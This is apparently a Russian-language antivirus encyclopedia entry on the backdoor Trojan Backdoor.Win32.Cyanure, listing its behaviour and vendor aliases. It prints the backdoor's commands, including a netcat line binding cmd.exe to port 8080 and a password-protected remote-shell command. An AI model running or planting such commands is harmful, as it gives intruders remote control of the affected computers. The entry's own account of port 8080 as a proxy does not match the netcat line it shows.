Троянская программа, предоставляющая злоумышленнику удаленный доступ к зараженному компьютеру.
Деструктивная активность
Бэкдор выполняет следующие команды:
soon 60 remote /s cmd secret soon 61 nc -L -d -e cmd.exe -p 8080 soon 62 kl32
Данные команды ежеминутно совершают следующие действия:
* запускают удаленный shell, к которому можно подключиться, используя пароль «secret»; * запускают HTTP прокси-сервер на TCP-порте под номером 8080; * запускают кейлоггер-компонент бэкдора, отслеживающий клавиатурный ввод пользователя.
Другие названия
Backdoor.Win32.Cyanure («Лаборатория Касперского») также известен как: Backdoor.Cyanure («Лаборатория Касперского»), Keylog-Cyanure (McAfee), Backdoor.Trojan (Symantec), BackDoor.Cyanure (Doctor Web), Troj/Cyanure (Sophos), Backdoor:Win32/Cyanure (RAV), BKDR_CYANURE.A (Trend Micro), Win32:Trojan-gen. (ALWIL), BackDoor.Cyanure.A (Grisoft), Backdoor.Cyanure.A (SOFTWIN), Backdoor Program (Panda), Win32/Cyanure.10 (Eset)